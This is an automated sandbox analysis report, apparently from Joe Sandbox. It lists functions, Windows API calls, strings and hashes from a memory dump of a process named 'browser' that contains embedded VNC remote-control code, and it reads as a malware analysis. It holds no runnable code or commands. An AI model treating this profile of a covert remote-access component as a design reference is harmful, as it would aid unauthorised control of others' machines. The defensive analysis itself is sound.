Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
String ID:
API String ID: 3151975580-0
Opcode ID: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
Instruction ID: febdad8acfb8ebc0871330e053b2ba217891653aa72915c2acb4e0e6cf408f50
Opcode Fuzzy Hash: a88dcc922a7d0e3135acbe79f47d9f0db8252c8db9b2e0ad08749d92f243f662
Instruction Fuzzy Hash: C7916C32B28A4189EB20EBB5D4046EDB3B1EF497A8F804635DE1D56B99DE38E505C310

Function 00007FF790C58590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165
windowsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00007FF790C585FB
WaitForSingleObject.KERNEL32 ref: 00007FF790C58608
free.LIBCMT ref: 00007FF790C58651
SendMessageA.USER32 ref: 00007FF790C58751
free.LIBCMT ref: 00007FF790C58763
free.LIBCMT ref: 00007FF790C58774
FreeLibrary.KERNEL32 ref: 00007FF790C587B5
DeleteObject.GDI32 ref: 00007FF790C5880A
free.LIBCMT ref: 00007FF790C58817
DeleteObject.GDI32 ref: 00007FF790C58832
free.LIBCMT ref: 00007FF790C5883F
DeleteObject.GDI32 ref: 00007FF790C5884B
free.LIBCMT ref: 00007FF790C58858
DeleteObject.GDI32 ref: 00007FF790C58864
free.LIBCMT ref: 00007FF790C58871

Strings

vncclient.cpp : deleting socket, xrefs: 00007FF790C58666
vncclient.cpp : ~vncClient() executing..., xrefs: 00007FF790C585BA

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
API String ID: 2172171234-2418058073
Opcode ID: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
Instruction ID: 536c463724a34da2a478304be1503131a80cf9e09ebae581a45c4014feb4a1b8
Opcode Fuzzy Hash: fd6e93333f79ed3293ab94359e9080bfa85a2ad45a32625ec314112d417f8769
Instruction Fuzzy Hash: CE811836A29A8285FB64EF31D8943F9A360FF85F94F880131DA0D6B795CF29E445C320

Function 00007FF790C82FF0 Relevance: 27.2, APIs: 18, Instructions: 183
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

std::exception::exception.LIBCMT ref: 00007FF790C8303E
GetWindowLongPtrA.USER32 ref: 00007FF790C830A7
GetDlgItem.USER32 ref: 00007FF790C830F5
SendMessageA.USER32 ref: 00007FF790C8310C
SendMessageA.USER32 ref: 00007FF790C83127
EndDialog.USER32 ref: 00007FF790C83268

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
String ID:
API String ID: 1935883720-0
Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
Instruction ID: 72bff69500445fa70ad20213443c28110f0b92f06a5dac833c73a3f4f7d965e4
Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
Instruction Fuzzy Hash: A5618121B18A4282EB20AB35E4587BAA3B1FF89F94F905131DE5E47B95DF3CE445C710

Function 00007FF790CC75C0 Relevance: 25.7, APIs: 17, Instructions: 151
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790CC75D9
ReleaseSemaphore.KERNEL32 ref: 00007FF790CC7625
GetLastError.KERNEL32 ref: 00007FF790CC764E
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7659
TlsAlloc.KERNEL32 ref: 00007FF790CC76A4
GetLastError.KERNEL32 ref: 00007FF790CC76B5
InitializeCriticalSection.KERNEL32 ref: 00007FF790CC76F0
GetCurrentProcess.KERNEL32 ref: 00007FF790CC772F
GetCurrentThread.KERNEL32 ref: 00007FF790CC7738
GetCurrentProcess.KERNEL32 ref: 00007FF790CC7741
DuplicateHandle.KERNELBASE ref: 00007FF790CC776C
GetLastError.KERNEL32 ref: 00007FF790CC7780
GetCurrentThreadId.KERNEL32 ref: 00007FF790CC779C
TlsSetValue.KERNEL32 ref: 00007FF790CC77AE
GetLastError.KERNEL32 ref: 00007FF790CC77B8

Part of subcall function 00007FF790CF2950: RaiseException.KERNEL32 ref: 00007FF790CF29CB

SetThreadPriority.KERNELBASE ref: 00007FF790CC77DA
GetLastError.KERNEL32 ref: 00007FF790CC77E4

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
String ID:
API String ID: 772457954-0
Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
Instruction ID: a9b905a361328da50a1e65d8e44f31206c278a05dfdba707fb9a3e0f869223a5
Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
Instruction Fuzzy Hash: 84613E35A28B1286EA60AF35E8482B9E3B0FF45B84F946535DA4D437A5DF3CF046C720

Function 00007FF790C4F940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.LIBCMT ref: 00007FF790C4F9C7
EnterCriticalSection.KERNEL32 ref: 00007FF790C4FA75
LeaveCriticalSection.KERNEL32 ref: 00007FF790C4FA9E
SleepEx.KERNELBASE ref: 00007FF790C4FAF2
swscanf.LIBCMT ref: 00007FF790C4FB87

Strings

false, xrefs: 00007FF790C4FBB7
REP, xrefs: 00007FF790C4FB2F
0.0.0.0, xrefs: 00007FF790C4F999
RFB, xrefs: 00007FF790C4FB56
RFB %03d.%03d, xrefs: 00007FF790C4F9BB, 00007FF790C4FB7B
true, xrefs: 00007FF790C4FBB0
i, xrefs: 00007FF790C4FA6A
vncclient.cpp : m_ms_logon set to %s, xrefs: 00007FF790C4FBC4

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
API String ID: 958158500-3765181313
Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
Instruction ID: cd0a3f6ca480a34d59ce5fe0c4ad7bf2bcd564ff4bf749d7bb0c19f41d339448
Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
Instruction Fuzzy Hash: AE91C332628B8286EB70DB35E4487EAB7A5FB86B94F800136DA4D43794CF7CE546C710

Function 00007FF790C99D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF790C99BC0: LoadLibraryA.KERNEL32 ref: 00007FF790C99C03
Part of subcall function 00007FF790C99BC0: GetProcAddress.KERNEL32 ref: 00007FF790C99C1B
Part of subcall function 00007FF790C99BC0: GetProcAddress.KERNEL32 ref: 00007FF790C99C2E
Part of subcall function 00007FF790C99BC0: GetSystemMetrics.USER32 ref: 00007FF790C99C4E
Part of subcall function 00007FF790C99BC0: GetCurrentProcessId.KERNEL32 ref: 00007FF790C99C61
Part of subcall function 00007FF790C99BC0: ProcessIdToSessionId.KERNEL32 ref: 00007FF790C99C76
Part of subcall function 00007FF790C99BC0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF790C99C85
Part of subcall function 00007FF790C99BC0: Process32First.KERNEL32 ref: 00007FF790C99CA4
Part of subcall function 00007FF790C99BC0: CloseHandle.KERNEL32 ref: 00007FF790C99CB1
Part of subcall function 00007FF790C99BC0: FreeLibrary.KERNEL32 ref: 00007FF790C99CBF

OpenProcess.KERNEL32 ref: 00007FF790C99DC0
OpenProcessToken.ADVAPI32 ref: 00007FF790C99DD6
CloseHandle.KERNEL32 ref: 00007FF790C99EBA

Strings

?, xrefs: 00007FF790C99E76

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
String ID: ?
API String ID: 2900023865-1684325040
Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction ID: 71476a64d2019076aab7f9a144bab9d5472acfdf14975989156904d5118d690f
Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction Fuzzy Hash: B131E532619B8285E760AB35F8443AAB3F4FB8A784F904135DA8D47B58EF3DE055CB50

Function 00007FF790C580DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF790C40270: CreateRectRgn.GDI32 ref: 00007FF790C4029D
Part of subcall function 00007FF790C40270: CreateRectRgn.GDI32 ref: 00007FF790C402C1
Part of subcall function 00007FF790C40270: CreateRectRgn.GDI32 ref: 00007FF790C402E5

Part of subcall function 00007FF790CE92A4: malloc.LIBCMT ref: 00007FF790CE92C7

CreateRectRgn.GDI32 ref: 00007FF790C581F8
LoadLibraryA.KERNEL32 ref: 00007FF790C58235
GetProcAddress.KERNEL32 ref: 00007FF790C58251

Strings

vncclient.cpp : vncClient() executing..., xrefs: 00007FF790C58277
USER32, xrefs: 00007FF790C5822E
vncclient.cpp : TEST 4, xrefs: 00007FF790C582DF
SendInput, xrefs: 00007FF790C58247

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CreateRect$AddressLibraryLoadProcmalloc
String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
API String ID: 1369618222-3178290357
Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
Instruction ID: 015752607a5f31f5455b6146a783896a7ddf6092a37ce074af042fee62c3e952
Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
Instruction Fuzzy Hash: F6B13832625BD1A6E358CF38EA443D9B7A8F744B44F54423AE3A807B91CF79A076C750

Function 00007FF790CC7B50 Relevance: 10.6, APIs: 7, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790CC7B61
GetLastError.KERNEL32 ref: 00007FF790CC7BC9
SetThreadPriority.KERNELBASE ref: 00007FF790CC7C1D
GetLastError.KERNEL32 ref: 00007FF790CC7C27
ResumeThread.KERNELBASE ref: 00007FF790CC7C47
GetLastError.KERNEL32 ref: 00007FF790CC7C52
LeaveCriticalSection.KERNEL32 ref: 00007FF790CC7C79

Part of subcall function 00007FF790CF2950: RaiseException.KERNEL32 ref: 00007FF790CF29CB

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
String ID:
API String ID: 1366308849-0
Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction ID: b31f7c9da672dc97f91875539d90120b27e61c5f714f7d9edb5c29476df1cda3
Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction Fuzzy Hash: 6C315A22A2864386EB20AF34E4551A9F3B0FF85358F901636D64D437A9DF7DF589C720

Function 00007FF790C9CF90 Relevance: 9.1, APIs: 6, Instructions: 110
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32 ref: 00007FF790C9CFDC
setsockopt.WS2_32 ref: 00007FF790C9D013
WSAIoctl.WS2_32 ref: 00007FF790C9D07E
getsockname.WS2_32 ref: 00007FF790C9D0AF
getpeername.WS2_32 ref: 00007FF790C9D0DE
SetPerTcpConnectionEStats.IPHLPAPI ref: 00007FF790C9D128

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
String ID:
API String ID: 2120259006-0
Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction ID: d25b8037d9bf4541605239c16deeee595fbb24d184dc5caf4418c1cde76d5cda
Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction Fuzzy Hash: 5D513472214B81DEE724DF30D4842D9B7A4FB4871CF404526EB5C87B48EB78E6A5CB60

Function 00007FF790CF285C Relevance: 9.1, APIs: 6, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 00007FF790CF2887
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF2892
_getptd.LIBCMT ref: 00007FF790CF28B8
CreateThread.KERNELBASE ref: 00007FF790CF290D
GetLastError.KERNEL32 ref: 00007FF790CF2918
free.LIBCMT ref: 00007FF790CF2923

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 3283625137-0
Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction ID: 89977564978105c71be44848c204123e3aff6a1c49efeb7f746add03e1409cf6
Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction Fuzzy Hash: DC21B221A187819AE620BB71A5122EAF2A4BF86B90FC44135EF5C037D6CF3CF5518711

Function 00007FF790C43FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameA.KERNEL32 ref: 00007FF790C4409C
LoadLibraryA.KERNELBASE ref: 00007FF790C440D7

Strings

Unable to load the Rich Edit (RICHED32.DLL) control!, xrefs: 00007FF790C440F1
RICHED32.DLL, xrefs: 00007FF790C440D0
Rich Edit Dll Loading, xrefs: 00007FF790C440EA

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ComputerLibraryLoadName
String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
API String ID: 2278097360-3189507618
Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
Instruction ID: af26637684ed37ea75e0e64577e90b0f20c629075e0ba9c09837da1b9e0cd49f
Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
Instruction Fuzzy Hash: 4431BF21B28B0281EBA8FB3AF4153A9A691EF86B44F404138CB4D073E5EE3DE454C360

Function 00007FF790C9A320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowExA.USER32 ref: 00007FF790C9A34F
GetWindowThreadProcessId.USER32 ref: 00007FF790C9A36A
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF790C9AB1F,?,?,?,00007FF790C57FB2), ref: 00007FF790C9A370
PostMessageA.USER32 ref: 00007FF790C9A387

Strings

WinVNC Tray Icon, xrefs: 00007FF790C9A340

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
